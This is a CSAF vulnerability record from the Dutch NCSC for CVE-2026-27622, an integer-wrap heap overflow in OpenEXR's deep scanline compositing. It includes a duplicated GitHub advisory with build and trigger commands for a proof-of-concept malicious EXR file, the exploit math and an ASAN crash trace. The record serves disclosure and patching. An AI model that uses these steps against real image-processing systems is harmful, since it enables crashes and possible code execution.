{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-27622", "tracking": { "current_release_date": "2026-03-23T02:59:11.499794Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-27622", "initial_release_date": "2026-03-02T18:40:10.093764Z", "revision_history": [ { "date": "2026-03-02T18:40:10.093764Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-02T18:40:12.265083Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-03T23:25:05.880305Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)." }, { "date": "2026-03-03T23:25:16.390669Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-03T23:38:52.884277Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (3).| References created (1).| CWES updated (1)." }, { "date": "2026-03-03T23:38:58.979212Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-04T02:39:45.298750Z", "number": "7", "summary": "References created (1)." }, { "date": "2026-03-04T07:35:10.064813Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-04T15:17:18.586252Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-04T15:17:24.539223Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-04T16:38:59.198773Z", "number": "11", "summary": "Unknown change." }, { "date": "2026-03-04T18:39:04.103602Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (14).| Product Identifiers created (17).| Products connected (6).| References created (2).| CWES updated (1)." }, { "date": "2026-03-04T18:39:12.842667Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-03-05T00:27:45.422886Z", "number": "14", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (8).| Product Identifiers created (5).| Product Remediations created (10).| Products created (2).| References created (3).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-05T00:27:48.101684Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-03-05T00:44:58.879501Z", "number": "16", "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (2)." }, { "date": "2026-03-05T00:45:09.339511Z", "number": "17", "summary": "NCSC Score updated." }, { "date": "2026-03-05T21:26:40.166531Z", "number": "18", "summary": "CVSS created.| Products created (3).| Product Identifiers created (3).| Exploits created (1)." }, { "date": "2026-03-05T21:26:45.540353Z", "number": "19", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:40:30.020593Z", "number": "20", "summary": "Source connected.| CVE status created. (valid)| EPSS created." } ], "status": "interim", "version": "20" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<3.2.6", "product": { "name": "vers:unknown/<3.2.6", "product_id": "CSAFPID-5763878", "product_identification_helper": { "cpe": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/>=3.3.0|<3.3.8", "product": { "name": "vers:unknown/>=3.3.0|<3.3.8", "product_id": "CSAFPID-5763879", "product_identification_helper": { "cpe": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/>=3.4.0|<3.4.6", "product": { "name": "vers:unknown/>=3.4.0|<3.4.6", "product_id": "CSAFPID-5763880", "product_identification_helper": { "cpe": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "OpenEXR" } ], "category": "vendor", "name": "OpenEXR" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5759811" } } ], "category": "product_name", "name": "OpenEXR" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-3020246" } } ], "category": "product_name", "name": "OpenEXR" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 6" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-3020248" } } ], "category": "product_name", "name": "OpenEXR" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-3020250" } } ], "category": "product_name", "name": "OpenEXR" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5759812" } } ], "category": "product_name", "name": "OpenEXR" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/10", "product": { "name": "vers:rpm/10", "product_id": "CSAFPID-2858634", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:10" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/6", "product": { "name": "vers:rpm/6", "product_id": "CSAFPID-1439321", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:6" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 6" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/7", "product": { "name": "vers:rpm/7", "product_id": "CSAFPID-1439315", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 7" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/8", "product": { "name": "vers:rpm/8", "product_id": "CSAFPID-1439317", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:8" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/9", "product": { "name": "vers:rpm/9", "product_id": "CSAFPID-1439319", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:9" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 9" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/3.2.3", "product": { "name": "vers:unknown/3.2.3", "product_id": "CSAFPID-5759241", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.2.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.4", "product": { "name": "vers:unknown/3.2.4", "product_id": "CSAFPID-5759242", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.2.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.5", "product": { "name": "vers:unknown/3.2.5", "product_id": "CSAFPID-5759243", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.2.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3.0", "product": { "name": "vers:unknown/3.3.0", "product_id": "CSAFPID-3021051", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.3.0" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3.1", "product": { "name": "vers:unknown/3.3.1", "product_id": "CSAFPID-3021052", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3.2", "product": { "name": "vers:unknown/3.3.2", "product_id": "CSAFPID-3021053", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.3.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3.3", "product": { "name": "vers:unknown/3.3.3", "product_id": "CSAFPID-5759244", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.3.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3.4", "product": { "name": "vers:unknown/3.3.4", "product_id": "CSAFPID-5759245", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.3.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3.5", "product": { "name": "vers:unknown/3.3.5", "product_id": "CSAFPID-5759246", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.3.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3.6", "product": { "name": "vers:unknown/3.3.6", "product_id": "CSAFPID-5759247", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.3.6" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3.7", "product": { "name": "vers:unknown/3.3.7", "product_id": "CSAFPID-5759248", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.3.7" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.0", "product": { "name": "vers:unknown/3.4.0", "product_id": "CSAFPID-5759249", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.4.0" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.1", "product": { "name": "vers:unknown/3.4.1", "product_id": "CSAFPID-5759250", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.4.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.2", "product": { "name": "vers:unknown/3.4.2", "product_id": "CSAFPID-5759251", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.4.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.3", "product": { "name": "vers:unknown/3.4.3", "product_id": "CSAFPID-5759252", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.4.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.4", "product": { "name": "vers:unknown/3.4.4", "product_id": "CSAFPID-5759253", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.4.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.5", "product": { "name": "vers:unknown/3.4.5", "product_id": "CSAFPID-5759254", "product_identification_helper": { "purl": "pkg:pypi/openexr@3.4.5" } } }, { "category": "product_version_range", "name": "vers:unknown/>=2.3.0|<3.2.6", "product": { "name": "vers:unknown/>=2.3.0|<3.2.6", "product_id": "CSAFPID-5757224" } }, { "category": "product_version_range", "name": "vers:unknown/>=3.3.0|<3.3.8", "product": { "name": "vers:unknown/>=3.3.0|<3.3.8", "product_id": "CSAFPID-5757225" } }, { "category": "product_version_range", "name": "vers:unknown/>=3.4.0|<3.4.6", "product": { "name": "vers:unknown/>=3.4.0|<3.4.6", "product_id": "CSAFPID-5757226" } } ], "category": "product_name", "name": "openexr" } ], "category": "vendor", "name": "AcademySoftwareFoundation" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1408023" } } ], "category": "product_name", "name": "openexr" } ], "category": "product_family", "name": "bookworm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1408024" } } ], "category": "product_name", "name": "openexr" } ], "category": "product_family", "name": "bullseye" } ], "category": "vendor", "name": "Debian" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-27622", "cwe": { "id": "CWE-787", "name": "Out-of-bounds Write" }, "notes": [ { "category": "description", "text": "## Summary\n\nFunction: `CompositeDeepScanLine::readPixels`, reachable from high-level multipart deep read flows (`MultiPartInputFile` + `DeepScanLineInputPart` + `CompositeDeepScanLine`).\n\nVulnerable lines (`src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp`):\n- `total_sizes[ptr] += counts[j][ptr];` (line ~511)\n- `overall_sample_count += total_sizes[ptr];` (line ~514)\n- `samples[channel].resize (overall_sample_count);` (line ~535)\n\nImpact: 32-bit sample-count accumulation wrap leads to undersized allocation, then decode writes with true sample volume, causing heap OOB write in `generic_unpack_deep_pointers` (`src/lib/OpenEXRCore/unpack.c:1374`) (DoS/Crash, memory corruption/RCE).\n\nAttack scenario:\n- Attacker provides multipart deep EXR with many parts and very large sample counts per pixel.\n- Uses compression (RLE/ZIPS) to keep file size relatively small vs decode pressure.\n- The overflow happens in composite sample accounting (`unsigned int`), while pointer progression for decode uses larger counters and reaches out-of-bounds.\n\nTested on: `OpenEXR 4.0.0-dev` (commit 83449669402080874b25ff1fa740649a9e6ea064) but this code has existed since v2.3.0\n\n## Steps to reproduce\n\n[composite_deepscanline_poc_bundle.patch](https://github.com/user-attachments/files/25383205/composite_deepscanline_poc_bundle.patch)\n\nPoC files used:\n- Writer/generator: `poc/composite_deep_scanline_e2e_compressed_poc.cpp`\n- Minimal high-level reader harness: `poc/simple_exr_reader.cpp`\n\nThe reader harness intentionally mimics realistic app behavior: open EXR, iterate parts, select `DEEPSCANLINE`, add sources to `CompositeDeepScanLine`, bind a normal `FrameBuffer`, then call `readPixels`.\n\nBuild with ASAN/UBSAN:\n\n```bash\ncmake -S . -B build-asan \\\n -DOPENEXR_BUILD_POC=ON \\\n -DCMAKE_BUILD_TYPE=RelWithDebInfo \\\n -DCMAKE_C_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \\\n -DCMAKE_CXX_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \\\n -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=address,undefined' \\\n -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=address,undefined'\n\ncmake --build build-asan --target composite_writer simple_exr_reader -j\n```\n\nGenerate malicious file (decode-path focused profile):\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 180s \\\n ./build-asan/poc/composite_writer \\\n --profile low-ram \\\n --file /tmp/composite_decode_focus.exr\n```\n\nTrigger:\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 30s \\\n ./build-asan/poc/simple_exr_reader /tmp/composite_decode_focus.exr\n```\n\nASAN builds are slower. If needed, a non-sanitized build + debugger is faster for iteration.\n\n## Example runs\n\nWriter (abbrev):\n\n```bash\n❯ ./build-asan/poc/composite_writer\nexploit math:\n benign samples : 300\n malicious parts : 86\n malicious samples per part : 50000000\n true total samples : 4300000300\n uint32 overflow reached : yes\n wrapped uint32 total : 5033004\n composite Z/A alloc from wrap : 40264032 bytes (38.40 MiB)\n per-part unpacked sample bytes : 300000000 bytes (286.10 MiB)\n min parts to overflow (current benign/samples): 86\nwriting compressed multipart deep EXR: /tmp/composite_deep_scanline_e2e_compressed.exr\nwriting donor malicious part (50000000 samples)\ncopying malicious part 1/86 from donor chunk\n...\nfile size: 26112896 bytes (24.90 MiB)\n```\n\nReader ASAN crash:\n\n```bash\n❯ ./build-asan/poc/simple_exr_reader\nreading /tmp/composite_overflow_optimized.exr with 16 deepscanline parts\n=================================================================\n==175024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed1a55d90b0 at pc 0x7ed1da7854f7 bp 0x7ffe8c83a680 sp 0x7ffe8c83a670\nWRITE of size 4 at 0x7ed1a55d90b0 thread T0\n #0 0x7ed1da7854f6 in generic_unpack_deep_pointers /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374\n #1 0x7ed1da7623e9 in exr_decoding_run /home/pop/sec/openexr/src/lib/OpenEXRCore/decoding.c:664\n #2 0x7ed1dbcb153b in run_decode /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:816\n #3 0x7ed1dbcc597f in Imf_4_0::DeepScanLineInputFile::Data::readData(Imf_4_0::DeepFrameBuffer const&, int, int, bool) /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:568\n #4 0x7ed1dbc01ca4 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:576\n #5 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n #6 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #7 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n #8 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\n0x7ed1a55d90b0 is located 0 bytes after 820132016-byte region [0x7ed1747b5800,0x7ed1a55d90b0)\nallocated by thread T0 here:\n #0 0x7ed1dd0fe548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95\n #1 0x7ed1dbc29600 in std::__new_allocator::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151\n #2 0x7ed1dbc29600 in std::allocator_traits >::allocate(std::allocator&, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482\n #3 0x7ed1dbc29600 in std::_Vector_base >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381\n #4 0x7ed1dbc29600 in std::_Vector_base >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:378\n #5 0x7ed1dbc29600 in std::vector >::_M_default_append(unsigned long) /usr/include/c++/13/bits/vector.tcc:663\n #6 0x7ed1dbc00184 in std::vector >::resize(unsigned long) /usr/include/c++/13/bits/stl_vector.h:1016\n #7 0x7ed1dbc00184 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:535\n #8 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n #9 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #10 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n #11 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374 in generic_unpack_deep_pointers\nShadow bytes around the buggy address:\n 0x7ed1a55d8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d9000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x7ed1a55d9080: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==175024==ABORTING\n```\n\n## Root cause analysis\n\nIn `CompositeDeepScanLine::readPixels`:\n\n1. Per-pixel totals are accumulated in `vector total_sizes`.\n2. For attacker-controlled large counts across many parts, `total_sizes[ptr]` wraps modulo `2^32`.\n3. `overall_sample_count` is then derived from wrapped totals and used in `samples[channel].resize(overall_sample_count)`.\n4. Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (`generic_unpack_deep_pointers`) overrun the undersized composite sample buffer.\n\n\nAllocation is based on a tiny wrapped value, but decode writes correspond to the true large sample volume.\n\n## Impact\n\nHeap OOB write during decode. This is at minimum a reliable crash/DoS. As heap corruption, this bug could be used for potential remote code execution.", "title": "github - https://github.com/advisories/GHSA-cr4v-6jm6-4963" }, { "category": "description", "text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27622" }, { "category": "description", "text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27622" }, { "category": "description", "text": "## Summary\n\nFunction: `CompositeDeepScanLine::readPixels`, reachable from high-level multipart deep read flows (`MultiPartInputFile` + `DeepScanLineInputPart` + `CompositeDeepScanLine`).\n\nVulnerable lines (`src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp`):\n- `total_sizes[ptr] += counts[j][ptr];` (line ~511)\n- `overall_sample_count += total_sizes[ptr];` (line ~514)\n- `samples[channel].resize (overall_sample_count);` (line ~535)\n\nImpact: 32-bit sample-count accumulation wrap leads to undersized allocation, then decode writes with true sample volume, causing heap OOB write in `generic_unpack_deep_pointers` (`src/lib/OpenEXRCore/unpack.c:1374`) (DoS/Crash, memory corruption/RCE).\n\nAttack scenario:\n- Attacker provides multipart deep EXR with many parts and very large sample counts per pixel.\n- Uses compression (RLE/ZIPS) to keep file size relatively small vs decode pressure.\n- The overflow happens in composite sample accounting (`unsigned int`), while pointer progression for decode uses larger counters and reaches out-of-bounds.\n\nTested on: `OpenEXR 4.0.0-dev` (commit 83449669402080874b25ff1fa740649a9e6ea064) but this code has existed since v2.3.0\n\n## Steps to reproduce\n\n[composite_deepscanline_poc_bundle.patch](https://github.com/user-attachments/files/25383205/composite_deepscanline_poc_bundle.patch)\n\nPoC files used:\n- Writer/generator: `poc/composite_deep_scanline_e2e_compressed_poc.cpp`\n- Minimal high-level reader harness: `poc/simple_exr_reader.cpp`\n\nThe reader harness intentionally mimics realistic app behavior: open EXR, iterate parts, select `DEEPSCANLINE`, add sources to `CompositeDeepScanLine`, bind a normal `FrameBuffer`, then call `readPixels`.\n\nBuild with ASAN/UBSAN:\n\n```bash\ncmake -S . -B build-asan \\\n -DOPENEXR_BUILD_POC=ON \\\n -DCMAKE_BUILD_TYPE=RelWithDebInfo \\\n -DCMAKE_C_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \\\n -DCMAKE_CXX_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \\\n -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=address,undefined' \\\n -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=address,undefined'\n\ncmake --build build-asan --target composite_writer simple_exr_reader -j\n```\n\nGenerate malicious file (decode-path focused profile):\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 180s \\\n ./build-asan/poc/composite_writer \\\n --profile low-ram \\\n --file /tmp/composite_decode_focus.exr\n```\n\nTrigger:\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 30s \\\n ./build-asan/poc/simple_exr_reader /tmp/composite_decode_focus.exr\n```\n\nASAN builds are slower. If needed, a non-sanitized build + debugger is faster for iteration.\n\n## Example runs\n\nWriter (abbrev):\n\n```bash\n❯ ./build-asan/poc/composite_writer\nexploit math:\n benign samples : 300\n malicious parts : 86\n malicious samples per part : 50000000\n true total samples : 4300000300\n uint32 overflow reached : yes\n wrapped uint32 total : 5033004\n composite Z/A alloc from wrap : 40264032 bytes (38.40 MiB)\n per-part unpacked sample bytes : 300000000 bytes (286.10 MiB)\n min parts to overflow (current benign/samples): 86\nwriting compressed multipart deep EXR: /tmp/composite_deep_scanline_e2e_compressed.exr\nwriting donor malicious part (50000000 samples)\ncopying malicious part 1/86 from donor chunk\n...\nfile size: 26112896 bytes (24.90 MiB)\n```\n\nReader ASAN crash:\n\n```bash\n❯ ./build-asan/poc/simple_exr_reader\nreading /tmp/composite_overflow_optimized.exr with 16 deepscanline parts\n=================================================================\n==175024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed1a55d90b0 at pc 0x7ed1da7854f7 bp 0x7ffe8c83a680 sp 0x7ffe8c83a670\nWRITE of size 4 at 0x7ed1a55d90b0 thread T0\n #0 0x7ed1da7854f6 in generic_unpack_deep_pointers /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374\n #1 0x7ed1da7623e9 in exr_decoding_run /home/pop/sec/openexr/src/lib/OpenEXRCore/decoding.c:664\n #2 0x7ed1dbcb153b in run_decode /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:816\n #3 0x7ed1dbcc597f in Imf_4_0::DeepScanLineInputFile::Data::readData(Imf_4_0::DeepFrameBuffer const&, int, int, bool) /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:568\n #4 0x7ed1dbc01ca4 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:576\n #5 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n #6 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #7 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n #8 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\n0x7ed1a55d90b0 is located 0 bytes after 820132016-byte region [0x7ed1747b5800,0x7ed1a55d90b0)\nallocated by thread T0 here:\n #0 0x7ed1dd0fe548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95\n #1 0x7ed1dbc29600 in std::__new_allocator::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151\n #2 0x7ed1dbc29600 in std::allocator_traits >::allocate(std::allocator&, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482\n #3 0x7ed1dbc29600 in std::_Vector_base >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381\n #4 0x7ed1dbc29600 in std::_Vector_base >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:378\n #5 0x7ed1dbc29600 in std::vector >::_M_default_append(unsigned long) /usr/include/c++/13/bits/vector.tcc:663\n #6 0x7ed1dbc00184 in std::vector >::resize(unsigned long) /usr/include/c++/13/bits/stl_vector.h:1016\n #7 0x7ed1dbc00184 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:535\n #8 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n #9 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #10 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n #11 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374 in generic_unpack_deep_pointers\nShadow bytes around the buggy address:\n 0x7ed1a55d8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8f00: 